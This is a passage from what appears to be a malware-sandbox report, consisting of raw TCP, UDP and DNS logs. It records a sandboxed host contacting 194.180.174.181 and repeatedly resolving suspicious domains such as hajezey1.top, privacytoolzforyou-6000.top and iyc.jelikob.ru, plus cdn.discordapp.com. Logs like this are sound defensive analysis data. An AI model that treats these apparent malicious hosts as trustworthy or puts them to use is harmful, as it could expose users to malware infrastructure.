                                                                                                                          Oct 29, 2021 17:07:34.699784040 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.699806929 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699846029 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699883938 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699923038 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.699934959 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.700062037 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700099945 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700138092 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700153112 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.700176001 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700186014 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.700215101 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700253963 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700324059 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700362921 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700372934 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.700491905 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700531960 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700542927 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.700571060 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700608015 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700645924 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700679064 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.700690031 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.700712919 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.700808048 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.701473951 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.701513052 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.701530933 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.701561928 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.701608896 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.701653004 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.701689959 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.701728106 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.701740026 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.701771975 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.701783895 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.701929092 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.701967955 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.701981068 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.702006102 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702048063 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702086926 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702114105 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.702147007 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.702264071 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702302933 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702338934 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702351093 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.702378035 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702415943 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702450991 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702477932 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.702495098 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702511072 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.702620983 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702657938 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.702713966 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.704631090 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.704669952 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.704709053 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.704710007 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.704749107 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.704771042 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.704786062 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.704824924 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.704962969 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.710165977 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710216045 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710249901 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710282087 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710313082 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710326910 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.710346937 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710371017 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.710380077 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710411072 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710434914 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.710444927 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710479975 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710510015 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710541964 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.710560083 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.711123943 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711158991 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711191893 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711241961 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.711304903 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711343050 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711374998 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711407900 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711432934 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.711441040 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711464882 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.711473942 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711508036 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711520910 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.711539984 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711586952 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711620092 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711654902 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711668968 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.711688042 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711721897 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711730957 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.711752892 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711786985 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711800098 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.711916924 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711950064 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711982012 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.711994886 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.712016106 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712033033 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.712049961 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712166071 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712198019 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712229967 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712239027 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.712263107 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712296009 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712330103 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712359905 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712371111 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.712393999 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712426901 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712457895 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712488890 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712497950 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.712522030 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712553978 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712587118 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712618113 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712630033 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.712651968 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.712680101 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.713291883 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.864865065 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.864895105 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.911854029 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:34.911878109 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:35.174335957 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:35.315562963 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:35.424910069 CEST4984480192.168.2.7172.67.160.46
                                                                                                                          Oct 29, 2021 17:07:35.424946070 CEST4984580192.168.2.7194.180.174.181

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 29, 2021 17:06:13.248503923 CEST6050153192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:13.350178003 CEST53605018.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:13.358766079 CEST5377553192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:13.646771908 CEST53537758.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:13.794297934 CEST5541153192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:14.082237005 CEST53554118.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.226468086 CEST6366853192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:14.595715046 CEST53636688.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:16.902287006 CEST5464053192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:16.921886921 CEST53546408.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:17.124558926 CEST5873953192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:17.143802881 CEST53587398.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:33.292114973 CEST5945153192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:33.311800957 CEST53594518.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:33.453531981 CEST5291453192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:33.877398968 CEST53529148.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.074884892 CEST5078153192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:34.094301939 CEST53507818.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.251200914 CEST5423053192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:34.268408060 CEST53542308.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.413896084 CEST5491153192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:34.433589935 CEST53549118.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:38.247075081 CEST5973053192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:38.265938997 CEST53597308.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:38.410478115 CEST5931053192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:38.696312904 CEST53593108.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:38.862276077 CEST5191953192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:38.881906986 CEST53519198.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:39.021927118 CEST6429653192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:39.041385889 CEST53642968.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:41.054130077 CEST5882053192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:41.073606968 CEST53588208.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:41.140971899 CEST6098353192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:41.163909912 CEST53609838.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:41.472244978 CEST4924753192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:41.490109921 CEST53492478.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:44.237303019 CEST5228653192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:44.259032011 CEST53522868.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.605164051 CEST5606453192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:46.624650002 CEST53560648.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.786530018 CEST6374453192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:46.806117058 CEST53637448.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.958837986 CEST6145753192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:46.978352070 CEST53614578.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.173934937 CEST5836753192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:47.240955114 CEST53583678.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.494182110 CEST6059953192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:47.513746977 CEST53605998.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.653481960 CEST5957153192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:47.675204039 CEST53595718.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.826894045 CEST5268953192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:47.848051071 CEST53526898.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.989427090 CEST5029053192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:48.006903887 CEST53502908.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:51.385051012 CEST6042753192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:51.405937910 CEST53604278.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:51.566962004 CEST5620953192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:51.586323977 CEST53562098.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:51.733282089 CEST5958253192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:51.750411034 CEST53595828.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:51.898785114 CEST6094953192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:51.917984009 CEST53609498.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:52.066353083 CEST5854253192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:52.085761070 CEST53585428.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:56.883527040 CEST5917953192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:56.902486086 CEST53591798.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.074208021 CEST6092753192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:57.093630075 CEST53609278.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:57.259084940 CEST5785453192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:57.753387928 CEST53578548.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:58.565092087 CEST6202653192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:06:58.586674929 CEST53620268.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:01.432631016 CEST5945353192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:01.452478886 CEST53594538.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:01.712368965 CEST6246853192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:01.731681108 CEST53624688.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:01.892929077 CEST5256353192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:01.912451029 CEST53525638.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:02.131309986 CEST5472153192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:02.150087118 CEST53547218.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:02.354588032 CEST6282653192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:02.374130011 CEST53628268.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:02.558885098 CEST6204653192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:02.576109886 CEST53620468.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:02.737893105 CEST5122353192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:02.757611990 CEST53512238.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:02.925671101 CEST6390853192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:02.945072889 CEST53639088.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:08.923965931 CEST4922653192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:08.942763090 CEST53492268.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:12.241388083 CEST6021253192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:12.261032104 CEST53602128.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:15.406409979 CEST5886753192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:15.507477999 CEST53588678.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:18.601684093 CEST5086453192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:18.621800900 CEST53508648.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:21.916219950 CEST6150453192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:21.933847904 CEST53615048.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:25.093633890 CEST6023153192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:25.113251925 CEST53602318.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:25.209403038 CEST5009553192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:25.313482046 CEST53500958.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.096317053 CEST5965453192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:33.127104998 CEST53596548.8.8.8192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.563877106 CEST5823353192.168.2.78.8.8.8
                                                                                                                          Oct 29, 2021 17:07:33.989962101 CEST53582338.8.8.8192.168.2.7

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                          Oct 29, 2021 17:06:13.248503923 CEST192.168.2.78.8.8.80x551bStandard query (0)xacokuo8.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:13.358766079 CEST192.168.2.78.8.8.80xc0e3Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:13.794297934 CEST192.168.2.78.8.8.80xc36dStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:14.226468086 CEST192.168.2.78.8.8.80xa0f1Standard query (0)privacytoolzforyou-6000.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:16.902287006 CEST192.168.2.78.8.8.80x706fStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:17.124558926 CEST192.168.2.78.8.8.80x270dStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:33.292114973 CEST192.168.2.78.8.8.80xf97fStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:33.453531981 CEST192.168.2.78.8.8.80x99fbStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:34.074884892 CEST192.168.2.78.8.8.80x84baStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:34.251200914 CEST192.168.2.78.8.8.80xf332Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:34.413896084 CEST192.168.2.78.8.8.80x51f8Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:38.247075081 CEST192.168.2.78.8.8.80xa6a7Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:38.410478115 CEST192.168.2.78.8.8.80x64b8Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:38.862276077 CEST192.168.2.78.8.8.80x8878Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:39.021927118 CEST192.168.2.78.8.8.80xef54Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:41.054130077 CEST192.168.2.78.8.8.80xf1fbStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:41.140971899 CEST192.168.2.78.8.8.80xf9a7Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:41.472244978 CEST192.168.2.78.8.8.80x23a4Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:44.237303019 CEST192.168.2.78.8.8.80x975aStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:46.605164051 CEST192.168.2.78.8.8.80xc274Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:46.786530018 CEST192.168.2.78.8.8.80x6fb1Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:46.958837986 CEST192.168.2.78.8.8.80xc988Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:47.173934937 CEST192.168.2.78.8.8.80x47f2Standard query (0)iyc.jelikob.ruA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:47.494182110 CEST192.168.2.78.8.8.80x30d1Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:47.653481960 CEST192.168.2.78.8.8.80x2d48Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:47.826894045 CEST192.168.2.78.8.8.80x1b59Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:47.989427090 CEST192.168.2.78.8.8.80x3258Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:51.385051012 CEST192.168.2.78.8.8.80x3aeeStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:51.566962004 CEST192.168.2.78.8.8.80x8213Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:51.733282089 CEST192.168.2.78.8.8.80x2d18Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:51.898785114 CEST192.168.2.78.8.8.80xbc7aStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:52.066353083 CEST192.168.2.78.8.8.80xcd07Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:56.883527040 CEST192.168.2.78.8.8.80xaec2Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                                                                                          Oct 29, 2021 17:06:57.074208021 CEST192.168.2.78.8.8.80x7c73Standard query (0)hajezey1.topA (IP address)IN (0x0001)
